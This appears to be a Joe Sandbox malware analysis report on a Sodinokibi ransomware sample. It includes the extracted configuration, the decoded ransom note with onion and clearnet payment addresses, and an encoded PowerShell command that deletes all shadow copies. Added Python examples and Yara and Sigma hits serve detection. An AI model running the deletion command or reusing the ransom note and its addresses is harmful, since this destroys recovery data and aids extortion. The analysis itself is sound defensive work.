ZQB0AHQAaQBuAGcAIABiAGUAbgBlAGYAaQB0AHMALgAgAEkAZgAgAHcAZQAgAGQAbwAgAG4AbwB0ACAAZABvACAAbwB1AHIAIAB3AG8AcgBrACAAYQBuAGQAIABsAGkAYQBiAGkAbABpAHQAaQBlAHMAIAAtACAAbgBvAGIAbwBkAHkAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIAB1AHMALgAgAEkAdABzACAAbgBvAHQAIABpAG4AIABvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzAC4ADQAKAFQAbwAgAGMAaABlAGMAawAgAHQAaABlACAAYQBiAGkAbABpAHQAeQAgAG8AZgAgAHIAZQB0AHUAcgBuAGkAbgBnACAAZgBpAGwAZQBzACwAIABZAG8AdQAgAHMAaABvAHUAbABkACAAZwBvACAAdABvACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlAC4AIABUAGgAZQByAGUAIAB5AG8AdQAgAGMAYQBuACAAZABlAGMAcgB5AHAAdAAgAG8AbgBlACAAZgBpAGwAZQAgAGYAbwByACAAZgByAGUAZQAuACAAVABoAGEAdAAgAGkAcwAgAG8AdQByACAAZwB1AGEAcgBhAG4AdABlAGUALgANAAoASQBmACAAeQBvAHUAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIABvAHUAcgAgAHMAZQByAHYAaQBjAGUAIAAtACAAZgBvAHIAIAB1AHMALAAgAGkAdABzACAAZABvAGU
AcwAgAG4AbwB0ACAAbQBhAHQAdABlAHIALgAgAEIAdQB0ACAAeQBvAHUAIAB3AGkAbABsACAAbABvAHMAZQAgAHkAbwB1AHIAIAB0AGkAbQBlACAAYQBuAGQAIABkAGEAdABhACwAIABjAGEAdQBzAGUAIABqAHUAcwB0ACAAdwBlACAAaABhAHYAZQAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5AC4AIABJAG4AIABwAHIAYQBjAHQAaQBjAGUAIAAtACAAdABpAG0AZQAgAGkAcwAgAG0AdQBjAGgAIABtAG8AcgBlACAAdgBhAGwAdQBhAGIAbABlACAAdABoAGEAbgAgAG0AbwBuAGUAeQAuAA0ACgANAAoAWwArAF0AIABIAG8AdwAgAHQAbwAgAGcAZQB0ACAAYQBjAGMAZQBzAHMAIABvAG4AIAB3AGUAYgBzAGkAdABlAD8AIABbACsAXQANAAoADQAKAFkAbwB1ACAAaABhAHYAZQAgAHQAdwBvACAAdwBhAHkAcwA6AA0ACgANAAoAMQApACAAWwBSAGUAYwBvAG0AbQBlAG4AZABlAGQAXQAgAFUAcwBpAG4AZwAgAGEAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIQANAAoAIAAgAGEAKQAgAEQAbwB3AG4AbABvAGEAZAAgAGEAbgBkACAAaQBuAHMAdABhAGwAbAAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAgAGYAcgBvAG0AIAB0AGgAaQBzACAAcwBpAHQAZQA6ACAAaAB0AHQAcABzADoALwAvAHQAbwByAHAAcgBvAGoAZQBjAHQALgBvAHIAZwAvAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBhAHAAbABlAGIAegB1ADQANwB3AGcAYQB6AGEAcABkAHEAawBzADYAdgByAGMAdgA2AHoAYwBuAGoAcABwAGsAYgB4AGIAcgA2AHcAawBlAHQAZgA1ADYAbgBmADYAYQBxADIAbgBtAHkAbwB5AGQALgBvAG4AaQBvAG4ALwB7AFUASQBEAH0ADQAKAA0ACgAyACkAIABJAGYAIABUAE8AUgAgAGIAbABvAGMAawBlAGQAIABpAG4AIAB5AG8AdQByACAAYwBvAHUAbgB0AHIAeQAsACAAdAByAHkAIAB0AG8AIAB1AHMAZQAgAFYAUABOACEAIABCAHUAdAAgAHkAbwB1ACAAYwBhAG4AIAB1AHMAZQAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlAC4AIABGAG8AcgAgAHQAaABpAHMAOgANAAoAIAAgAGEAKQAgAE8AcABlAG4AIAB5AG8AdQByACAAYQBuAHkAIABiAHIAbwB3AHMAZQByACAAKABDAGgAcgBvAG0AZQAsACAARgBpAHIAZQBmAG8AeAAsACAATwBwAGUAcgBhACwAIABJAEUALAAgAEUAZABnAGUAKQANAAoAIAAgAGIAKQAgAE8AcABlAG4AIABvAHUAcgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBkAGUAYwByAHkAcAB0AG8AcgAuAGMAYwAvAHsAVQBJAEQAfQANAAoADQAKAFcAYQByAG4AaQBuAGcAOgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQAgAGMAYQBuACAAYgBlACAAYgBsAG8AYwBrAGUAZAAsACAAdABoAGEAdABzACAAdwBoAHkAIABmAGkAcgBzAHQAIAB2AGEAcgBpAGEAbgB0ACAAbQB1AGMAaAAgAGIAZQB0AHQAZQByACAAYQBuAGQAIABtAG8AcgBlACAAYQB2AGEAaQBsAGEAYgBsAGU
ALgANAAoADQAKAFcAaABlAG4AIAB5AG8AdQAgAG8AcABlAG4AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALAAgAHAAdQB0ACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAGQAYQB0AGEAIABpAG4AIAB0AGgAZQAgAGkAbgBwAHUAdAAgAGYAbwByAG0AOgANAAoASwBlAHkAOgANAAoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAA0ACgANAAoAIQAhACEAIABEAEEATgBHAEUAUgAgACEAIQAhAA0ACgBEAE8ATgBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AVAAgAHUAcwBlACAAYQBuAHkAIAB0AGgAaQByAGQAIABwAGEAcgB0AHkAIABzAG8AZgB0AHcAYQByAGUAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAeQBvAHUAcgAgAGQAYQB0AGEAIABvAHIAIABhAG4AdABpAHYAaQByAHUAcwAgAHMAbwBsAHUAdABpAG8AbgBzACAALQAgAGkAdABzACAAbQBhAHkAIABlAG4AdABhAGkAbAAgAGQAYQBtAGEAZwBlACAAbwBmACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABhAG4AZAAsACAAYQBzACAAcgBlAHMAdQBsAHQALAAgAFQAaABlACAATABvAHMAcwAgAGEAbABsACAAZABhAHQAYQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEADQAKAE8ATgBFACAATQBPAFIARQAgAFQASQBNAEUAOgAgAEkAdABzACAAaQBuACAAeQBvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzACAAdABvACAAZwBlAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYgBhAGMAawAuACAARgByAG8AbQAgAG8AdQByACAAcwBpAGQAZQAsACAAdwBlACAAKAB0AGgAZQAgAGIAZQBzAHQAIABzAHAAZQBjAGkAYQBsAGkAcwB0AHMAKQAgAG0AYQBrAGUAIABlAHYAZQByAHkAdABoAGkAbgBnACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAsACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAHMAaABvAHUAbABkACAAbgBvAHQAIABpAG4AdABlAHIAZgBlAHIAZQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEAAAA=", "et": 1, "wipe": false, "wfld": ["backup"], "nname": "{EXT}-readme.txt", "pk": "U1v/e5rsm+MBAyMWauKbSQoNySoEV1oLxrYMgzIi4SI=", "net": false, "exp": false, "arn": false}
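The configuration above is one JSON object: the text fields "img" and "nbody" are base64 over UTF-16LE, "dmn" is a single ';'-joined string rather than an array, and "wht" groups the extensions (ext), file names (fls) and folders (fld) the sample leaves alone. The Python below is an added example, not part of the Joe Sandbox report or of the malware: it parses a constructed excerpt of that configuration (the "dmn" list cut to three of its several hundred entries, the long "nbody" note omitted), decodes "img", checks the length of "pk", and applies the "wht" lists to a few sample paths. Reading "wht" as an exclusion list and "pk" as a 32-byte Curve25519-sized public key follows public Sodinokibi analyses and is an assumption, not something this page states.

```python
import base64
import json
from pathlib import PureWindowsPath

# Constructed excerpt of the configuration shown in this report. Field names
# and the values kept are copied from the page; "dmn" is cut to three of its
# several hundred entries and the long "nbody" ransom note is omitted.
CONFIG_JSON = r'''{"prc": [], "sub": "4920", "svc": [],
 "wht": {"ext": ["theme", "sys", "lnk", "dll", "exe", "bin", "ps1", "cmd", "bat"],
         "fls": ["ntuser.dat", "thumbs.db", "desktop.ini", "boot.ini"],
         "fld": ["programdata", "windows.old", "program files", "program files (x86)",
                 "appdata", "$recycle.bin", "system volume information"]},
 "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA",
 "dmn": "rerekatu.com;comarenterprises.com;lapmangfpt.info.vn",
 "dbg": false,
 "pid": "$2a$10$QattBzSnFe.5XRJJ1p0cN.Co.kQ6PbwK3Q6eZtQUfTXEQhSWGiqhe",
 "et": 1, "wipe": false, "wfld": ["backup"], "nname": "{EXT}-readme.txt",
 "pk": "U1v/e5rsm+MBAyMWauKbSQoNySoEV1oLxrYMgzIi4SI=",
 "net": false, "exp": false, "arn": false}'''


def decode_utf16_b64(blob: str) -> str:
    """Decode base64-wrapped UTF-16LE text (the encoding of "img" and "nbody",
    and of PowerShell's -EncodedCommand); trailing NULs are dropped."""
    return base64.b64decode(blob).decode("utf-16-le").rstrip("\x00")


def load_config(text: str) -> dict:
    """Parse the extracted JSON and normalise the fields an analyst uses most."""
    cfg = json.loads(text)
    cfg["dmn"] = [d for d in cfg["dmn"].split(";") if d]  # stored as one ';'-joined string
    cfg["img_text"] = decode_utf16_b64(cfg["img"])
    # 32 bytes, the size of a Curve25519 public key (assumption from public analyses)
    cfg["pk_bytes"] = base64.b64decode(cfg["pk"])
    cfg["wht"] = {k: {v.lower() for v in vals} for k, vals in cfg["wht"].items()}
    return cfg


def is_excluded(path: str, cfg: dict) -> bool:
    """Return True if the sample would skip this file: a folder on the path is in
    wht.fld, the file name is in wht.fls, or the extension is in wht.ext."""
    p = PureWindowsPath(path)
    wht = cfg["wht"]
    folders = [part.lower() for part in p.parts[:-1]]
    if any(f in wht["fld"] for f in folders):
        return True
    if p.name.lower() in wht["fls"]:
        return True
    return p.suffix.lower().lstrip(".") in wht["ext"]


if __name__ == "__main__":
    cfg = load_config(CONFIG_JSON)
    print("ransom note file name:", cfg["nname"])
    print("wallpaper text:", cfg["img_text"].replace("\r\n", " / "))
    for sample in (r"C:\Users\user\Desktop\report.docx",
                   r"C:\Windows\System32\kernel32.dll",
                   r"C:\Program Files\App\data.sqlite",
                   r"C:\Users\user\ntuser.dat"):
        verdict = "skip" if is_excluded(sample, cfg) else "ENCRYPT"
        print(f"{verdict:8} {sample}")
```

Two things the paths show: kernel32.dll is spared only by its extension, because "windows" itself is not in wht.fld (only "windows.old" and the "$windows.~" upgrade folders are), while everything under "program files" is spared regardless of type. The decoded "img" text is the wallpaper message, typo included, and {EXT} is the per-victim extension substituted at run time.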

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.420567524.0000000002FFF000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security
00000000.00000003.420475668.0000000002FFF000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security
Process Memory Space: F73BkMlJhw.exe PID: 3756 | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security

Sigma Overview

System Summary:

Sigma detected: Delete Shadow Copy Via Powershell
Source: Process started
Author: Joe Security
Data:
  Command / CommandLine / ProcessCommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  CommandLine|base64offset|contains: ^
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: 'C:\Users\user\Desktop\F73BkMlJhw.exe'
  ParentImage: C:\Users\user\Desktop\F73BkMlJhw.exe
  ParentProcessId: 3756
  ProcessId: 4700

The -e argument is base64 over UTF-16LE and decodes to:
  Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
This enumerates every Win32_ShadowCopy instance through WMI and deletes it, removing the Volume Shadow Copy restore points from which encrypted files could otherwise be recovered. The base64offset modifier on the rule's CommandLine field matches the encoded form of a plain-text pattern at each of the three possible base64 alignments, which is why the rule fires on the encoded command line without decoding it first.
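The Sigma hit above is the encoded PowerShell one-liner from the process tree. The Python below is an added example, not part of the Joe Sandbox report or of the Sigma rule it cites: it decodes -e/-ec/-enc/-EncodedCommand arguments from process-creation events and matches shadow-copy deletion in the decoded script. The events are constructed in a Sysmon-like shape with illustrative field names; the first two mirror this report's process tree. The vssadmin, wmic and Remove-CimInstance/Remove-WmiObject patterns are a generalisation beyond the single WMI one-liner shown on this page.

```python
import base64
import binascii
import re
from typing import List, Optional


def b64_utf16(text: str) -> str:
    """Encode text the way powershell.exe -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# The encoded argument exactly as it appears in this report's process tree.
REPORT_ENCODED = (
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
    "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Constructed process-creation events in a Sysmon-like shape (field names are
# illustrative). The first two mirror this report's process tree; the others
# are added negatives and a plain-text variant.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ProcessId": 4700, "ParentProcessId": 3756, "Image": POWERSHELL,
     "CommandLine": "powershell -e " + REPORT_ENCODED},
    {"ProcessId": 4460, "ParentProcessId": 4700, "Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 5012, "ParentProcessId": 1234, "Image": POWERSHELL,
     "CommandLine": 'powershell -NoProfile -Command "Get-Date"'},
    {"ProcessId": 5100, "ParentProcessId": 1234, "Image": POWERSHELL,
     "CommandLine": "powershell.exe -EncodedCommand " + b64_utf16("Get-Process | Out-Null")},
    {"ProcessId": 5200, "ParentProcessId": 1234, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c vssadmin.exe delete shadows /all /quiet"},
]

# Shadow-copy deletion patterns. The first is what this report's decoded
# command does; the other two are common variants added as a generalisation.
SHADOW_DELETE_PATTERNS = {
    "wmi_shadowcopy_delete": re.compile(
        r"win32_shadowcopy.*?(\.delete\s*\(|remove-ciminstance|remove-wmiobject)", re.I | re.S),
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I),
    "wmic_shadowcopy_delete": re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -e/-ec/-enc/-EncodedCommand (powershell.exe accepts
    any unambiguous prefix of the switch name), or None if there is no such
    argument or its value is not valid base64-wrapped UTF-16LE."""
    args = cmdline.split()
    for flag, value in zip(args, args[1:]):
        name = flag.lstrip("-/").lower()
        if flag[0] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def scan(events: List[dict]) -> List[dict]:
    """Run the patterns over the decoded script (or the raw command line when
    nothing is encoded) and return one finding per matching event."""
    findings = []
    for ev in events:
        cmdline = ev.get("CommandLine", "")
        script = decode_encoded_command(cmdline)
        text = cmdline if script is None else script
        for rule, pattern in SHADOW_DELETE_PATTERNS.items():
            if pattern.search(text):
                findings.append({"ProcessId": ev["ProcessId"],
                                 "ParentProcessId": ev.get("ParentProcessId"),
                                 "rule": rule, "decoded": script is not None, "text": text})
                break
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"PID {f['ProcessId']} (parent {f['ParentProcessId']}) {f['rule']}: {f['text']}")
```

Decoding before matching is the point: the same Win32_Shadowcopy pattern catches the encoded event from this report and would catch a plain `-Command` variant, while the benign encoded `Get-Process` event and the conhost child produce nothing. Prefix handling matters because `-e`, `-ec` and `-enc` all reach powershell.exe's -EncodedCommand and appear interchangeably in the wild.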

        Signature Overview

        AV Detection:

        Antivirus / Scanner detection for submitted sample
        Source: F73BkMlJhw.exeAvira: detected
        Found malware configuration
        Source: F73BkMlJhw.exe.3756.0.memstrMalware Configuration Extractor: Sodinokibi {"prc": [], "sub": "4920", "svc": [], "wht": {"ext": ["theme", "sys", "lnk", "deskthemepack", "dll", "drv", "scr", "spl", "ocx", "cpl", "ps1", "cur", "shs", "rom", "wpx", "msstyles", "bin", "msu", "rtp", "themepack", "msi", "cab", "nls", "nomedia", "ico", "386", "lock", "idx", "key", "msp", "icns", "ani", "hlp", "prf", "cmd", "bat", "diagcab", "adv", "hta", "diagpkg", "icl", "mod", "ics", "diagcfg", "mpa", "com", "msc", "exe"], "fls": ["ntuser.dat", "thumbs.db", "desktop.ini", "ntldr", "bootfont.bin", "ntuser.ini", "ntuser.dat.log", "iconcache.db", "autorun.inf", "bootsect.bak", "boot.ini"], "fld": ["programdata", "$windows.~ws", "windows.old", "$windows.~bt", "mozilla", "boot", "intel", "program files (x86)", "tor browser", "application data", "program files", "$recycle.bin", "google", "appdata", "system volume information", "perflogs", "msocache"]}, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": 
"rerekatu.com;comarenterprises.com;lapmangfpt.info.vn;tradiematepro.com.au;copystar.co.uk;mountaintoptinyhomes.com;woodleyacademy.org;thefixhut.com;architecturalfiberglass.org;triactis.com;ncs-graphic-studio.com;rehabilitationcentersinhouston.net;denifl-consulting.at;gymnasedumanagement.com;makeitcount.at;kidbucketlist.com.au;hvccfloorcare.com;ventti.com.ar;elimchan.com;fransespiegels.nl;chrissieperry.com;kaliber.co.jp;101gowrie.com;southeasternacademyofprosthodontics.org;bastutunnan.se;monark.com;pivoineetc.fr;americafirstcommittee.org;hypozentrum.com;digi-talents.com;xn--fn-kka.no;wmiadmin.com;wsoil.com.sg;tips.technology;ftlc.es;ivfminiua.com;tongdaifpthaiphong.net;destinationclients.fr;urist-bogatyr.ru;bockamp.com;huehnerauge-entfernen.de;villa-marrakesch.de;lillegrandpalais.com;lachofikschiet.nl;psc.de;huissier-creteil.com;easytrans.com.au;montrium.com;ruralarcoiris.com;transportesycementoshidalgo.es;fotoideaymedia.es;sexandfessenjoon.wordpress.com;space.ua;baronloan.org;courteney-cox.net;zweerscreatives.nl;qlog.de;sterlingessay.com;xlarge.at;houseofplus.com;bodyfulls.com;slwgs.org;spectrmash.ru;dontpassthepepper.com;botanicinnovations.com;luckypatcher-apkz.com;35-40konkatsu.net;remcakram.com;gw2guilds.org;harveybp.com;live-con-arte.de;gasbarre.com;macabaneaupaysflechois.com;praxis-management-plus.de;bildungsunderlebnis.haus;minipara.com;schraven.de;deepsouthclothingcompany.com;oslomf.no;iqbalscientific.com;reddysbakery.com;cyntox.com;associacioesportivapolitg.cat;tomoiyuma.com;iyengaryogacharlotte.com;lukeshepley.wordpress.com;figura.team;selfoutlet.com;broseller.com;nhadatcanho247.com;katiekerr.co.uk;mirkoreisser.de;ora-it.de;asteriag.com;ussmontanacommittee.us;sairaku.net;bee4win.com;kindersitze-vergleich.de;licor43.de;irinaverwer.com;launchhubl.com;antiaginghealthbenefits.com;homecomingstudio.com;latestmodsapks.com;mmgdouai.fr;planchaavapor.net;12sta
        Multi AV Scanner detection for submitted file
        Source: F73BkMlJhw.exeVirustotal: Detection: 68%
        Source: F73BkMlJhw.exeReversingLabs: Detection: 79%
        Machine Learning detection for sample
        Source: F73BkMlJhw.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00095086 CryptAcquireContextW,CryptGenRandom,0_2_00095086
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000959CD CryptBinaryToStringW,CryptBinaryToStringW,0_2_000959CD
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009596C CryptStringToBinaryW,CryptStringToBinaryW,0_2_0009596C
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: z:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: x:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: v:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: t:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: r:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: p:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: n:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: l:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: j:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: h:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: f:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: d:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: b:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: y:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: w:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: u:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: s:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: q:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: o:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: m:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: k:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: i:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: g:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: e:
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: a:
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000970C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_000970C1

        Networking:

        Found Tor onion address
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.420484795.0000000003008000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
        Source: 3zvp3joi3-readme.txt64.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.420484795.0000000003008000.00000004.00000040.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmp, 3zvp3joi3-readme.txt64.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.420484795.0000000003008000.00000004.00000040.sdmpString found in binary or memory: http://decryptor.cc/
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmp, 3zvp3joi3-readme.txt64.0.drString found in binary or memory: http://decryptor.cc/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmp, 3zvp3joi3-readme.txt64.0.drString found in binary or memory: https://torproject.org/

        Spam, unwanted Advertisements and Ransom Demands:

        Found ransom note / readme
        Source: C:\3zvp3joi3-readme.txtDropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3zvp3joi3.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D52) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F78E6169B25D34D5Warning: secondary website can be blocked, thats why first variant much
        Yara detected Sodinokibi Ransomware
        Source: Yara matchFile source: 00000000.00000003.420567524.0000000002FFF000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.420475668.0000000002FFF000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: F73BkMlJhw.exe PID: 3756, type: MEMORY
        Contains functionality to change the wallpaper
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009419B GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_0009419B
        Modifies existing user documents (likely ransomware behavior)
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile moved: C:\Users\user\Desktop\MNULNCRIYC.docx
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile deleted: C:\Users\user\Desktop\MNULNCRIYC.docx
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile moved: C:\Users\user\Desktop\DTBZGIOOSO.xlsx
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile deleted: C:\Users\user\Desktop\DTBZGIOOSO.xlsx
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG.pdf

        System Summary:

        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00093839 OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_00093839
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009B1B10_2_0009B1B1
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000985070_2_00098507
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009A51C0_2_0009A51C
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00097D860_2_00097D86
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00097FE40_2_00097FE4
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs F73BkMlJhw.exe
